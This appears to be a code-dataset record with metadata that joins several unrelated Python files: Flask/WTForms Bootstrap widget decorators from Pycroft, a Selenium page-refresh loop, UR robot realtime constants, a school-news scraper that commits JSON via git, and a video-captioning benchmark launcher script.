# coding=utf-8 # Copyright (c) 2016 The Pycroft Authors. See the AUTHORS file. # This file is part of the Pycroft project and licensed under the terms of # the Apache License, Version 2.0. See the LICENSE file for details. from itertools import chain from flask import url_for from markupsafe import escape, Markup import wtforms.ext.sqlalchemy.fields import wtforms.fields from wtforms.widgets.core import html_params, HTMLString from web.templates import page_resources from functools import reduce class WidgetDecorator(object): """Decorate widgets.""" def __init__(self, widget): """ :param widget: Original widget to be decorated. """ if widget is None: raise ValueError('Parameter widget may not be None.') self.widget = widget class BootstrapFormGroupDecorator(WidgetDecorator): """ Wraps a widget inside a Bootstrap form-group and prints errors. The widget's output is wrapped in a Bootstrap form-group. Any field errors are displayed in Bootstrap help-blocks after the widget. """ def __call__(self, field, **kwargs): classes = [u'form-group'] if field.errors: classes.append(u'has-error') return HTMLString(u''.join([ Markup(u'<div class="{0}">').format(u' '.join(classes)), self.widget(field, **kwargs), u'</div>'])) class BootstrapFormControlDecorator(WidgetDecorator): """Adds the Bootstrap form-control class to a widget.""" def __call__(self, field, **kwargs): if 'class_' in kwargs: kwargs['class_'] = u'form-control ' + kwargs['class_'] else: kwargs['class_'] = u'form-control' return self.widget(field, **kwargs) class BootstrapStandardDecorator(WidgetDecorator): """ Renders a field in horizontal layout. Horizontal layout is a two column layout, where the label is placed in the left column and the field is placed right next to it. """ def render_horizontal(self, field, **kwargs): html = [u'<div class="col-sm-5">', field.label(class_=u'control-label'), u'</div>', u'<div class="col-sm-7">', self.widget(field, **kwargs), u'</div>'] help_block = Markup(u'<div class="col-sm-12">' u'<span class="help-block">{0}</span>' u'</div>') if field.description: html.append(help_block.format(field.description)) html.extend(help_block.format(e) for e in field.errors) return HTMLString(u''.join(html)) def render_inline(self, field, **kwargs): return HTMLString(u''.join([ field.label(class_=u'sr-only'), self.widget(field, placeholder=field.label.text, **kwargs), ])) def render_basic(self, field, **kwargs): html = [field.label(), self.widget(field, **kwargs)] help_block = Markup(u'<span class="help-block">{0}</span>') if field.description: html.append(help_block.format(field.description)) html.extend(help_block.format(e) for e in field.errors) return HTMLString(u''.join(html)) def __call__(self, field, **kwargs): render_mode = kwargs.pop("render_mode", "basic") if render_mode == "basic": return self.render_basic(field, **kwargs) elif render_mode == "horizontal": return self.render_horizontal(field, **kwargs) elif render_mode == "inline": return self.render_inline(field, **kwargs) else: raise ValueError("Unknown render mode: {0}".format(render_mode)) class BootstrapRadioCheckboxDecorator(WidgetDecorator): """ Renders a field in horizontal layout. Horizontal layout is a two column layout, where the label is placed in the left column and the field is placed right next to it. """ wrapper_class = None def _render(self, field, **kwargs): return HTMLString(u''.join([ u'<div class="', self.wrapper_class, u'">', field.label( u"{0} {1}".format( self.widget(field, **kwargs), escape(field.label.text) )), u'</div>', ])) def render_basic(self, field, **kwargs): return self._render(field, **kwargs) def render_horizontal(self, field, **kwargs): return HTMLString(u''.join([ u'<div class="col-sm-offset-5 col-sm-7">', self._render(field, **kwargs), u'</div>', ])) def render_inline(self, field, **kwargs): return field.label(u"{0} {1}".format( self.widget(field, **kwargs), escape(field.label.text) ), class_=self.wrapper_class + "-inline") def __call__(self, field, **kwargs): render_mode = kwargs.pop("render_mode", "horizontal") if render_mode == "basic": return self.render_basic(field, **kwargs) elif render_mode == "horizontal": return self.render_horizontal(field, **kwargs) elif render_mode == "inline": return self.render_inline(field, **kwargs) else: raise ValueError("Unknown render mode: {0}".format(render_mode)) class BootstrapRadioDecorator(BootstrapRadioCheckboxDecorator): wrapper_class = u"radio" class BootstrapCheckboxDecorator(BootstrapRadioCheckboxDecorator): wrapper_class = u"checkbox" class BootstrapFieldListWidget(object): def __call__(self, field, **kwargs): return HTMLString(u''.join(chain( (Markup(u'<p class="help-block">{0}</p>').format(e) for e in field.errors), (f(**kwargs) for f in field) ))) class BootstrapFormFieldWidget(object): def __call__(self, field, **kwargs): return HTMLString(u"<div class=\"form-field\">" + u''.join(f(**kwargs) for f in field) + u"</div>") class BootstrapStaticFieldWidget(object): """Render a static Bootstrap control.""" def __call__(self, field, **kwargs): kwargs["class_"] = u"form-control-static" # Assume that the field provides access to its value. value = field._value() return HTMLString(u''.join([ u'<p {}>'.format(html_params(**kwargs)), value, u'</p>', ])) def decorators(widget): """ Yields all decorators of a widget starting from the outermost. """ while isinstance(widget, WidgetDecorator): yield type(widget) widget = widget.widget def decorate(widget, *decorators): """ Decorate a widget with a list of decorators. :param widget: a widget :param tuple[WidgetDecorator] decorators: some decorators :rtype: WidgetDecorator :returns: decorated widget """ return reduce(lambda w, d: d(w), decorators, widget) def decorate_field(field, *decorators): """ Return a field's widget decorated with the given decorators.. :param wtforms.fields.core.Field field: a WTForms field :param tuple[WidgetDecorator] decorators: some decorators :rtype: WidgetDecorator :returns: decorated widget """ return decorate(field.widget, *decorators) from markupsafe import Markup class BootstrapDatepickerWidget(object): """Renders datetime fields using bootstrap-datepicker.""" def __call__(self, field, **kwargs): kwargs["data-provide"] = u"datepicker" for (option, value) in field.datepicker_options.items(): attribute = 'data-date-{0}'.format(option.replace('_', '-')) kwargs[attribute] = value page_resources.link_script(url_for( "static", filename="libs/bootstrap-datepicker/js/bootstrap-datepicker.js" )) page_resources.link_script(url_for( "static", filename="libs/bootstrap-datepicker/js/locales/bootstrap-datepicker.de.js" )) options = dict(kwargs, name=field.name) if field.data: options["value"] = field.data return HTMLString(u"<input {0}>".format(html_params(**options))) class CheckBoxWidget(wtforms.widgets.Select): """A simple multi selection widget rendered as Checkbox list. It uses the bootstrap markup. """ def __call__(self, field, **kwargs): kwargs.setdefault('type', 'checkbox') field_id = kwargs.pop('id', field.id) html = [] for value, label, checked in field.iter_choices(): choice_id = u'{}-{}'.format(field_id, value) options = dict(kwargs, name=field.name, value=value, id=choice_id) html.append(u'<label class="checkbox" {}>'.format(html_params(id=field_id))) if checked: options['checked'] = 'checked' html.append(u'<input {}>'.format(html_params(**options))) html.append(label) html.append(u'</label>') return u''.join(html) class LazyLoadSelectWidget(wtforms.widgets.Select): """This is the widget for the LazyLoadSelectField Please look at web.form.fields.LazyLoadSelectField for more information. """ def __call__(self, field, **kwargs): conditions = getattr(field, "conditions", None) if conditions is not None: kwargs["data-fieldids"] = ",".join(conditions) kwargs['data-role'] = u'lazyloadselect' kwargs['data-url'] = url_for(field.data_endpoint) kwargs['value'] = str(field.data) return super(LazyLoadSelectWidget, self).__call__(field, **kwargs) class Disabler(WidgetDecorator): def __call__(self, field, **kwargs): kwargs['disabled'] = True return self.widget(field, **kwargs) class MoneyFieldDecorator(WidgetDecorator): """Adds the Bootstrap form-control class to a widget.""" def __call__(self, field, **kwargs): kwargs['class_'] += ' money-amount' return (u"<div class=\"input-group\">" + self.widget(field, **kwargs) + u"<span class=\"input-group-addon\">€</span></div>")
34.673469
96
0.614087
from itertools import chain from flask import url_for from markupsafe import escape, Markup import wtforms.ext.sqlalchemy.fields import wtforms.fields from wtforms.widgets.core import html_params, HTMLString from web.templates import page_resources from functools import reduce class WidgetDecorator(object): def __init__(self, widget): if widget is None: raise ValueError('Parameter widget may not be None.') self.widget = widget class BootstrapFormGroupDecorator(WidgetDecorator): def __call__(self, field, **kwargs): classes = [u'form-group'] if field.errors: classes.append(u'has-error') return HTMLString(u''.join([ Markup(u'<div class="{0}">').format(u' '.join(classes)), self.widget(field, **kwargs), u'</div>'])) class BootstrapFormControlDecorator(WidgetDecorator): def __call__(self, field, **kwargs): if 'class_' in kwargs: kwargs['class_'] = u'form-control ' + kwargs['class_'] else: kwargs['class_'] = u'form-control' return self.widget(field, **kwargs) class BootstrapStandardDecorator(WidgetDecorator): def render_horizontal(self, field, **kwargs): html = [u'<div class="col-sm-5">', field.label(class_=u'control-label'), u'</div>', u'<div class="col-sm-7">', self.widget(field, **kwargs), u'</div>'] help_block = Markup(u'<div class="col-sm-12">' u'<span class="help-block">{0}</span>' u'</div>') if field.description: html.append(help_block.format(field.description)) html.extend(help_block.format(e) for e in field.errors) return HTMLString(u''.join(html)) def render_inline(self, field, **kwargs): return HTMLString(u''.join([ field.label(class_=u'sr-only'), self.widget(field, placeholder=field.label.text, **kwargs), ])) def render_basic(self, field, **kwargs): html = [field.label(), self.widget(field, **kwargs)] help_block = Markup(u'<span class="help-block">{0}</span>') if field.description: html.append(help_block.format(field.description)) html.extend(help_block.format(e) for e in field.errors) return HTMLString(u''.join(html)) def __call__(self, field, **kwargs): render_mode = kwargs.pop("render_mode", "basic") if render_mode == "basic": return self.render_basic(field, **kwargs) elif render_mode == "horizontal": return self.render_horizontal(field, **kwargs) elif render_mode == "inline": return self.render_inline(field, **kwargs) else: raise ValueError("Unknown render mode: {0}".format(render_mode)) class BootstrapRadioCheckboxDecorator(WidgetDecorator): wrapper_class = None def _render(self, field, **kwargs): return HTMLString(u''.join([ u'<div class="', self.wrapper_class, u'">', field.label( u"{0} {1}".format( self.widget(field, **kwargs), escape(field.label.text) )), u'</div>', ])) def render_basic(self, field, **kwargs): return self._render(field, **kwargs) def render_horizontal(self, field, **kwargs): return HTMLString(u''.join([ u'<div class="col-sm-offset-5 col-sm-7">', self._render(field, **kwargs), u'</div>', ])) def render_inline(self, field, **kwargs): return field.label(u"{0} {1}".format( self.widget(field, **kwargs), escape(field.label.text) ), class_=self.wrapper_class + "-inline") def __call__(self, field, **kwargs): render_mode = kwargs.pop("render_mode", "horizontal") if render_mode == "basic": return self.render_basic(field, **kwargs) elif render_mode == "horizontal": return self.render_horizontal(field, **kwargs) elif render_mode == "inline": return self.render_inline(field, **kwargs) else: raise ValueError("Unknown render mode: {0}".format(render_mode)) class BootstrapRadioDecorator(BootstrapRadioCheckboxDecorator): wrapper_class = u"radio" class BootstrapCheckboxDecorator(BootstrapRadioCheckboxDecorator): wrapper_class = u"checkbox" class BootstrapFieldListWidget(object): def __call__(self, field, **kwargs): return HTMLString(u''.join(chain( (Markup(u'<p class="help-block">{0}</p>').format(e) for e in field.errors), (f(**kwargs) for f in field) ))) class BootstrapFormFieldWidget(object): def __call__(self, field, **kwargs): return HTMLString(u"<div class=\"form-field\">" + u''.join(f(**kwargs) for f in field) + u"</div>") class BootstrapStaticFieldWidget(object): def __call__(self, field, **kwargs): kwargs["class_"] = u"form-control-static" value = field._value() return HTMLString(u''.join([ u'<p {}>'.format(html_params(**kwargs)), value, u'</p>', ])) def decorators(widget): while isinstance(widget, WidgetDecorator): yield type(widget) widget = widget.widget def decorate(widget, *decorators): return reduce(lambda w, d: d(w), decorators, widget) def decorate_field(field, *decorators): return decorate(field.widget, *decorators) from markupsafe import Markup class BootstrapDatepickerWidget(object): def __call__(self, field, **kwargs): kwargs["data-provide"] = u"datepicker" for (option, value) in field.datepicker_options.items(): attribute = 'data-date-{0}'.format(option.replace('_', '-')) kwargs[attribute] = value page_resources.link_script(url_for( "static", filename="libs/bootstrap-datepicker/js/bootstrap-datepicker.js" )) page_resources.link_script(url_for( "static", filename="libs/bootstrap-datepicker/js/locales/bootstrap-datepicker.de.js" )) options = dict(kwargs, name=field.name) if field.data: options["value"] = field.data return HTMLString(u"<input {0}>".format(html_params(**options))) class CheckBoxWidget(wtforms.widgets.Select): def __call__(self, field, **kwargs): kwargs.setdefault('type', 'checkbox') field_id = kwargs.pop('id', field.id) html = [] for value, label, checked in field.iter_choices(): choice_id = u'{}-{}'.format(field_id, value) options = dict(kwargs, name=field.name, value=value, id=choice_id) html.append(u'<label class="checkbox" {}>'.format(html_params(id=field_id))) if checked: options['checked'] = 'checked' html.append(u'<input {}>'.format(html_params(**options))) html.append(label) html.append(u'</label>') return u''.join(html) class LazyLoadSelectWidget(wtforms.widgets.Select): def __call__(self, field, **kwargs): conditions = getattr(field, "conditions", None) if conditions is not None: kwargs["data-fieldids"] = ",".join(conditions) kwargs['data-role'] = u'lazyloadselect' kwargs['data-url'] = url_for(field.data_endpoint) kwargs['value'] = str(field.data) return super(LazyLoadSelectWidget, self).__call__(field, **kwargs) class Disabler(WidgetDecorator): def __call__(self, field, **kwargs): kwargs['disabled'] = True return self.widget(field, **kwargs) class MoneyFieldDecorator(WidgetDecorator): def __call__(self, field, **kwargs): kwargs['class_'] += ' money-amount' return (u"<div class=\"input-group\">" + self.widget(field, **kwargs) + u"<span class=\"input-group-addon\">€</span></div>")
true
true
f728ee3b1671b49bf022dd945f48cb355a0d7e61
691
py
Python
AutoRefresh/AutoRefresh.py
GWDx/Script
35c9e8aefa7378608d99de5bf711c22383c1bb09
[ "MIT" ]
1
2021-10-03T07:43:41.000Z
2021-10-03T07:43:41.000Z
AutoRefresh/AutoRefresh.py
GWDx/Script
35c9e8aefa7378608d99de5bf711c22383c1bb09
[ "MIT" ]
null
null
null
AutoRefresh/AutoRefresh.py
GWDx/Script
35c9e8aefa7378608d99de5bf711c22383c1bb09
[ "MIT" ]
null
null
null
from selenium import webdriver from time import sleep import re browser = webdriver.Firefox() browser.get('https://jw.ustc.edu.cn') input() windows = browser.window_handles browser.switch_to.window(windows[1]) while True: element = browser.find_element_by_id('table') elementText = element.text number = re.sub(r'.*? (\d+\/\d+).*', r'\1', elementText.split('\n')[2]) # 行数 selectedNumber = int(number.split('/')[0]) selectedRange = int(number.split('/')[1]) if (selectedNumber < selectedRange): raise (RuntimeError('exist')) try: browser.refresh() except: browser.refresh() sleep(.5) browser.quit()
24.678571
82
0.625181
from selenium import webdriver from time import sleep import re browser = webdriver.Firefox() browser.get('https://jw.ustc.edu.cn') input() windows = browser.window_handles browser.switch_to.window(windows[1]) while True: element = browser.find_element_by_id('table') elementText = element.text number = re.sub(r'.*? (\d+\/\d+).*', r'\1', elementText.split('\n')[2]) selectedNumber = int(number.split('/')[0]) selectedRange = int(number.split('/')[1]) if (selectedNumber < selectedRange): raise (RuntimeError('exist')) try: browser.refresh() except: browser.refresh() sleep(.5) browser.quit()
true
true
f728eef6dc9a58573ba69af9db9c00b0d0e6663c
4,166
py
Python
roman/ur/realtime/constants.py
drMJ/roman
9650e73ec6fbb2d8044aa1bbf89fd671843ea54e
[ "MIT" ]
14
2020-04-03T03:48:35.000Z
2021-11-08T11:17:41.000Z
roman/ur/realtime/constants.py
drMJ/roman
9650e73ec6fbb2d8044aa1bbf89fd671843ea54e
[ "MIT" ]
5
2020-04-17T21:59:35.000Z
2022-01-21T23:21:45.000Z
roman/ur/realtime/constants.py
drMJ/roman
9650e73ec6fbb2d8044aa1bbf89fd671843ea54e
[ "MIT" ]
10
2020-04-16T15:44:25.000Z
2021-11-10T08:22:52.000Z
################################################################################################################################ ## constants.py ## Contains various constants and defaults used both on the urscript side and the python side ## The defaults can be oveeriden when calling utils.load_script, by including them in the defs hashtable. ################################################################################################################################ UR_ZERO = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0] UR_STATE_ENTRIES_COUNT = 72 # This is how many numbers we expect to receive with every response UR_PROTOCOL_VERSION = 0.1 # Possible types of commands UR_CMD_KIND_ESTOP = 0 UR_CMD_KIND_MOVE_JOINT_SPEEDS = 1 # Accelerate to and maintain the specified speed UR_CMD_KIND_MOVE_TOOL_POSE = 2 # Move towards an absolute goal position expressed as a tool pose. UR_CMD_KIND_MOVE_JOINT_POSITIONS = 3 # Move towards an absolute goal position expressed in joint angles. UR_CMD_KIND_MOVE_TOOL_LINEAR = 4 # Move in a straight line towards an absolute goal position expressed as a tool pose. UR_CMD_KIND_READ = 8 UR_CMD_KIND_CONFIG = 9 UR_CMD_KIND_IK_QUERY = 10 UR_CMD_KIND_INVALID = 11 # Command field indices UR_CMD_ID = 0 UR_CMD_KIND = 1 UR_CMD_CONFIG_MASS = 2 UR_CMD_CONFIG_TOOL_COG = [3, 6] UR_CMD_CONFIG_TOOL_TIP = [6, 12] UR_CMD_MOVE_TARGET = [2, 8] UR_CMD_MOVE_MAX_SPEED = 8 UR_CMD_MOVE_MAX_ACCELERATION = 9 UR_CMD_MOVE_FORCE_LOW_BOUND = [10, 16] UR_CMD_MOVE_FORCE_HIGH_BOUND = [16, 22] UR_CMD_MOVE_CONTACT_HANDLING = 22 UR_CMD_MOVE_CONTROLLER = 23 UR_CMD_ENTRIES_COUNT = 24 # This is how many floats we expect with each command (not including the count prefix). Needs to stay under 30 (UR restriction). # State field indices UR_STATE_TIME = 0 UR_STATE_CMD_ID = 1 UR_STATE_STATUS = 2 UR_STATE_JOINT_POSITIONS = [3, 9] UR_STATE_JOINT_SPEEDS = [9, 15] UR_STATE_TOOL_POSE = [15, 21] UR_STATE_TOOL_SPEED = [21, 27] UR_STATE_TARGET_JOINT_POSITIONS = [27, 33] UR_STATE_TARGET_JOINT_SPEEDS = [33, 39] UR_STATE_TARGET_TOOL_POSE = [39, 45] UR_STATE_TARGET_TOOL_SPEED = [45, 51] UR_STATE_JOINT_TORQUES = [51, 57] UR_STATE_TOOL_FORCE = [57, 63] UR_STATE_TOOL_ACCELERATION = [63, 66] UR_STATE_SENSOR_FORCE = [66, 72] # status bits UR_STATUS_FLAG_MOVING = 1 UR_STATUS_FLAG_CONTACT = 2 UR_STATUS_FLAG_DEADMAN = 4 UR_STATUS_FLAG_RESERVED = 8 UR_STATUS_FLAG_DONE = 16 UR_STATUS_FLAG_GOAL_REACHED = 32 ################################################################################################################################ ## Default values ################################################################################################################################ # robot settings UR_DEFAULT_MASS = 3.25 UR_DEFAULT_TOOL_COG = [0, 0, 0.12] UR_DEFAULT_TCP = [0, 0, 0.12, 0, 0, 0] # control UR_TIME_SLICE = 1./125 # by default, use the CB2 version. UR_SPEED_TOLERANCE = 0.05 # rad/s UR_SPEED_NORM_ZERO = 0.05 # rad/s UR_JOINTS_POSITION_TOLERANCE = 0.001 # rad UR_TOOL_POSITION_TOLERANCE = 0.001 # m UR_TOOL_ROTATION_TOLERANCE = 0.001 # rad UR_DEADMAN_SWITCH_LIMIT = 0.1 # seconds UR_EPSILON = 0.00001 UR_DEFAULT_FORCE_LOW_BOUND = [-20.0, -20.0, -20.0, -2, -2, -2] UR_DEFAULT_FORCE_HIGH_BOUND = [20.0, 20.0, 20.0, 2, 2, 2] UR_FORCE_IGNORE_HIGH = [1000, 1000, 1000, 100, 100, 100] UR_FORCE_IGNORE_LOW = [-1000, -1000, -1000, -100, -100, -100] UR_DEFAULT_ACCELERATION = 0.1 # rad/s2 UR_FAST_STOP_ACCELERATION = 3.0 # rad/s2 UR_DEFAULT_MAX_SPEED = 0.1 # rad/s # interface / protocol UR_RT_PORT = 30003 # real-time UR interface (RT) UR_ROBOT_IP = "192.168.1.2" UR_DEFAULT_CLIENT_IP = "192.168.1.9" UR_DEFAULT_CLIENT_PORT = 50003 UR_ROBOT_VERSION_CB2 = 0 UR_ROBOT_VERSION_ESERIES = 2 UR_ROBOT_VERSION = UR_ROBOT_VERSION_CB2 # these need to be defined outside, e.g. through the defs parameter of utils.load_script() #UR_CLIENT_IP #UR_CLIENT_PORT # URScript-compatible slicing function def s_(vec, bounds, start): s = bounds[0] + start cnt = bounds[1] - bounds[0] if cnt == 3: return [vec[s], vec[s + 1], vec[s + 2]] elif cnt == 6: return [vec[s], vec[s + 1], vec[s + 2], vec[s + 3], vec[s + 4], vec[s + 5]] #ur:end #ur:end
37.872727
154
0.660346
true
true
f728ef3ac6c9afa2c6e1b048510aab2473316fca
1,781
py
Python
data/main.py
banahaker/mingdao
a5dc7fce50c23a0e287813d914234f6b84027cdf
[ "MIT" ]
2
2021-12-19T11:44:44.000Z
2022-01-27T09:29:58.000Z
data/main.py
banahaker/mingdao
a5dc7fce50c23a0e287813d914234f6b84027cdf
[ "MIT" ]
null
null
null
data/main.py
banahaker/mingdao
a5dc7fce50c23a0e287813d914234f6b84027cdf
[ "MIT" ]
null
null
null
import requests import bs4 import json import os # define git commit function def gitCommit(): os.chdir('..') os.system('git status') os.system("git add .") os.system("git status") os.system('git commit -m "update data information"') os.system("git push") # get page response url = 'http://www.mingdao.edu.tw/homeX/Web/' header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.57" } response = requests.get(url, headers=header) response.encoding = 'utf-8' data = response.text # response page analyse root = bs4.BeautifulSoup(data, 'html.parser') infos = root.find_all('a', class_="style44") informationList = [] for i in range(16): key = infos[i] if i<7: news_id = key.attrs['onclick'] news_id = news_id.replace("','公告內容','scrollbars=yes,resizable=yes,width=500,height=400')", "") news_id = news_id.replace("MM_openBrWindow('../../md/200310/honor/show.php?News_ID=", "") singleInfo = { "content": key.string, "news_id": news_id } informationList.append(singleInfo) else: news_id = key.attrs['href'] news_id = news_id.replace("../../md/200310/honor/show.php?News_ID=", "") singleInfo = { "content": key.string, "news_id": news_id } informationList.append(singleInfo) honorRoll = informationList[0:8] announcements = informationList[8:16] # deal with json file allInfo = [honorRoll, announcements] jsonAllInfo = json.dumps(allInfo, ensure_ascii=False, sort_keys=True, indent=2) # write json file with open('information.json', 'w', encoding='utf-8') as file: file.write(jsonAllInfo) gitCommit()
29.196721
152
0.647951
import requests import bs4 import json import os def gitCommit(): os.chdir('..') os.system('git status') os.system("git add .") os.system("git status") os.system('git commit -m "update data information"') os.system("git push") url = 'http://www.mingdao.edu.tw/homeX/Web/' header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.57" } response = requests.get(url, headers=header) response.encoding = 'utf-8' data = response.text root = bs4.BeautifulSoup(data, 'html.parser') infos = root.find_all('a', class_="style44") informationList = [] for i in range(16): key = infos[i] if i<7: news_id = key.attrs['onclick'] news_id = news_id.replace("','公告內容','scrollbars=yes,resizable=yes,width=500,height=400')", "") news_id = news_id.replace("MM_openBrWindow('../../md/200310/honor/show.php?News_ID=", "") singleInfo = { "content": key.string, "news_id": news_id } informationList.append(singleInfo) else: news_id = key.attrs['href'] news_id = news_id.replace("../../md/200310/honor/show.php?News_ID=", "") singleInfo = { "content": key.string, "news_id": news_id } informationList.append(singleInfo) honorRoll = informationList[0:8] announcements = informationList[8:16] allInfo = [honorRoll, announcements] jsonAllInfo = json.dumps(allInfo, ensure_ascii=False, sort_keys=True, indent=2) with open('information.json', 'w', encoding='utf-8') as file: file.write(jsonAllInfo) gitCommit()
true
true
f728efb52d226dd7c63082f446ae3c4e21518b76
6,913
py
Python
latency_pipe.py
ybCliff/VideoCaptioning
93fc3b095c970e51e1e24909163a827df98d6ef3
[ "MIT" ]
3
2020-05-16T23:59:57.000Z
2021-06-14T01:59:41.000Z
latency_pipe.py
ybCliff/VideoCaptioning
93fc3b095c970e51e1e24909163a827df98d6ef3
[ "MIT" ]
null
null
null
latency_pipe.py
ybCliff/VideoCaptioning
93fc3b095c970e51e1e24909163a827df98d6ef3
[ "MIT" ]
3
2020-05-17T00:01:01.000Z
2020-07-28T18:04:05.000Z
import sys sys.path.append("../") import json import os import argparse import torch import shutil import numpy as np num_loop = 1 #for i in range(num_loop): # op = 'CUDA_VISIBLE_DEVICES=2 python ar_test.py -i 0 -em test -analyze -ns -write_time -beam_size 1' # os.system(op) ''' for bs in [1, 5, 6]: op = 'CUDA_VISIBLE_DEVICES=0 python ar_test.py -i 1 -em test -analyze -write_time -beam_size %d'%bs os.system(op) for iteration in range(1, 8): for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=0 python test_nar.py --index 1 -beam_alpha 1.35 -em test -nd -paradigm mp -print_latency -write_time -lbs 6 -s 100 ' + ' -i %d'%iteration os.system(op) for iteration in range(1, 8): for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=0 python test_nar.py --index -1 -beam_alpha 1.35 -em test -nd -paradigm mp -print_latency -write_time -lbs 6 ' + ' -i %d'%iteration os.system(op) #myset = [[5, 1], [5, 2], [5, 3], [5, 4], [5, 5], [4, 4], [3, 3], [2, 2], [1, 1]] myset = [[3, 4], [3, 5]] for item in myset: i, lbs = item op = 'CUDA_VISIBLE_DEVICES=0 python test_nar.py --index 1 -beam_alpha 1.35 -em test -nd -paradigm mp -s 100 -print_latency -write_time' + ' -i %d'%i + ' -lbs %d'%lbs os.system(op) for q in range(4, 0, -1): for iteration in range(2): for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=0 python test_nar.py --index 1 -beam_alpha 1.35 -em test -nd -paradigm ef -s 100 -print_latency -write_time -lbs 6 ' + ' -i %d'%iteration + ' -q %d'%q os.system(op) ''' for bs in [1, 5, 6]: op = 'CUDA_VISIBLE_DEVICES=0 python ar_test.py -i 0 -em test -analyze -write_time -beam_size %d'%bs os.system(op) for iteration in range(1, 8): for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=0 python test_nar.py --index 0 -em test -nd -paradigm mp -print_latency -write_time -lbs 6 -s 100 ' + ' -i %d'%iteration os.system(op) for iteration in range(1, 8): for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=0 python test_nar.py --index -2 -em test -nd -paradigm mp -print_latency -write_time -lbs 6 ' + ' -i %d'%iteration os.system(op) #myset = [[5, 1], [5, 2], [5, 3], [5, 4], [5, 5], [4, 4], [3, 3], [2, 2], [1, 1]] myset = [[1,1], [1, 2],[1, 3], [1, 4],[1, 5]] for item in myset: i, lbs = item op = 'CUDA_VISIBLE_DEVICES=0 python test_nar.py --index 0 -em test -nd -paradigm mp -s 100 -print_latency -write_time' + ' -i %d'%i + ' -lbs %d'%lbs os.system(op) for q in range(4, 0, -1): for iteration in range(2): for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=0 python test_nar.py --index 0 -em test -nd -paradigm ef -s 100 -print_latency -write_time -lbs 6 ' + ' -i %d'%iteration + ' -q %d'%q os.system(op) ''' for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=0 python ar_test.py -i 0 -em test -analyze -ns -write_time -beam_size 1' os.system(op) for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=0 python ar_test.py -i 0 -em test -analyze -ns -write_time' os.system(op) for iteration in range(1, 8): for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=0 python test_nar.py -ns --index 0 -em test -nd -paradigm mp -s 100 -print_latency -write_time' + ' -i %d'%iteration os.system(op) for iteration in range(1, 8): for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=0 python test_nar.py -ns --index -2 -em test -nd -paradigm mp -s 100 -print_latency -write_time' + ' -i %d'%iteration os.system(op) ''' ''' myset = [[5, 1], [5, 2], [5, 3], [5, 4], [5, 5], [5, 6], [4, 4], [3, 3], [2, 2], [1, 1]] for item in myset: i, lbs = item op = 'CUDA_VISIBLE_DEVICES=0 python test_nar.py --index 0 -em test -nd -paradigm mp -s 100 -print_latency -write_time' + ' -i %d'%i + ' -lbs %d'%lbs os.system(op) for q in range(4, 0, -1): for iteration in range(2): for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=0 python test_nar.py --index 0 -em test -nd -paradigm ef -s 100 -print_latency -write_time' + ' -i %d'%iteration + ' -q %d'%q os.system(op) for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=3 python ar_test.py -i 1 -em test -analyze -ns -write_time -beam_size 1' os.system(op) for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=3 python ar_test.py -i 1 -em test -analyze -ns -write_time' os.system(op) for iteration in range(1, 7): for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=3 python test_nar.py --index 0 -em test -nd -paradigm mp -s 100 -print_latency -write_time -ns' + ' -i %d'%iteration os.system(op) for iteration in range(5, 7): for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=3 python test_nar.py --index 0 -em test -nd -paradigm mp -print_latency -write_time -ns' + ' -i %d'%iteration os.system(op) for iteration in range(5, 7): for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=3 python test_nar.py --index 1 -beam_alpha 1.15 -em test -nd -paradigm mp -print_latency -write_time -ns' + ' -i %d'%iteration os.system(op) for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=3 python test_nar.py --index 1 -beam_alpha 1.15 -em test -nd -paradigm ef -print_latency -write_time -ns' os.system(op) for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=3 python test_nar.py --index 1 -beam_alpha 1.15 -em test -nd -paradigm ef -s 100 -print_latency -write_time -ns' os.system(op) for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=3 python test_nar.py --index 1 -beam_alpha 1.15 -em test -nd -paradigm ef -s 100 -print_latency -write_time -ns -q 2' os.system(op) for iteration in range(1, 7): for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=3 python test_nar.py --index 0 -em test -nd -paradigm mp -s 100 -print_latency -write_time -i 5 ' + ' -lbs %d'%iteration if i > 0: op += " -ns " os.system(op) for iteration in range(3, 7): for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=3 python test_nar.py --index 1 -em test -nd -paradigm mp -beam_alpha 1.15 -s 100 -print_latency -write_time -i 5 ' + ' -lbs %d'%iteration if i > 0: op += " -ns " os.system(op) for iteration in range(1, 7): for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=3 python test_nar.py --index -1 -em test -nd -paradigm mp -beam_alpha 1.15 -print_latency -write_time -i 5 ' + ' -lbs %d'%iteration if i > 0: op += " -ns " os.system(op) for iteration in range(1, 7): for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=3 python test_nar.py --index 0 -s 100 -em test -nd -paradigm mp -print_latency -write_time -lbs 5 ' + ' -i %d'%iteration #if i > 0: # op += " -ns " os.system(op) '''
38.19337
189
0.621872
